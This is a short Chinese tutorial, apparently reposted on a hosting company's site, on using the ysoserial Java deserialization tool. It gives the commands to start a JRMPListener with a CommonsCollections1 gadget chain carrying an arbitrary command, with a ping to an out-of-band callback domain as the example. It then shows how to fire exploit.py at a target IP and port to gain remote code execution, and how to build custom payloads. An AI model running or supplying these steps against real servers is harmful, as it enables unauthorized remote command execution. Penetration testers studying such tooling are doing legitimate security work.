反序列化工具ysoserial使用介绍-创新互联

反序列化工具ysoserial使用介绍

0x00 ysoserial是什么?

ysoserial集合了各种java反序列化payload;
下载地址:https://github.com/angelwhu/ysoserial

成都创新互联自2013年起,先为思南等服务建站,思南等地企业,进行企业商务咨询服务。为思南企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

0x01 基本使用方法

在公网vps上执行:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener  【port】 CommonsCollections1 '【commands】'

port:公网vps上监听的端口号
commands:需要执行的命令
例子:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2  rce.267hqw.ceye.io'

重启一个shell窗口:

python exploit.py 【目标ip】 【目标端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】  【JRMPListener port】 JRMPClient

列子:

python exploit.py 118.89.53.139  7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139  1099 JRMPClient

0x02 在ysoserial编写自己的payload

  1. git clone https://github.com/fanyingjie2/ysoserial.git
  2. 将自己编写的payload放在下载的包中:路径ysoserial/src/main/java/ysoserial/payloads/
  3. 修改Dockerfile
    反序列化工具ysoserial使用介绍
  4. docker build -t ysoserial .
  5. docker run -ti ID号 /bin/bash
  6. 在docke中执行 apt-get update
  7. 在docker中执行apt-get install lrzsz
  8. sz target/ysoserial.jar

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


分享名称:反序列化工具ysoserial使用介绍-创新互联
URL地址:http://azwzsj.com/article/hisod.html